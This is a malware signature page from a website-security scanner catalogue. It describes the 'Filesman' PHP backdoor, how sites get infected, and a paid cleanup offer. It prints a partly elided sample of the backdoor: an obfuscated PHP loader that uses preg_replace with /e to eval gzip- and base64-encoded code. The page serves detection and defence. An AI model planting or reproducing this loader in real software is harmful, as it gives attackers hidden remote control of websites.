SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. backdoor-phpfilesman02

backdoor-phpfilesman02

Description: We detected the "Filesman" backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.

Affecting: Any web site (often through outdated WordPress, Joomla, osCommerce and stolen passwords).

Clean up: You can also sign up with us and let our team remove the malware for you.

Malware dump:

<?php
$auth_pass = "";
$color = "#df5";
$default_action = "FilesMan";
$default_charset = "Windows-1251";
preg_replace("/.*/e","x65x76x61x6Cx28x67x7Ax69x6Ex66x6Cx61x74x65x28x62x61x73x65x36x34x5Fx64x65x63x6Fx64x65x28'7b1tVxs50jD8OXvO9R9Er3fanhhjm2Q2Y7ADIZCQSSAD5GUC3N623bZ7aLs93W0Mk+W/31Wll5b6xZhkdq/7OedhJtDdKpVKUkkqlapK3rDM1tzJLL4tl7qn+ycf90/O7ddnZ++7H+Ctu/t..NRCty4s8Uh1VQKxLg+xQC0T93+IV4sxw/c08okR1wKtoyadLX6Dl6tDg3WxVxFoHhkj6Yn/xc='x29x29x29x3B",".");
?>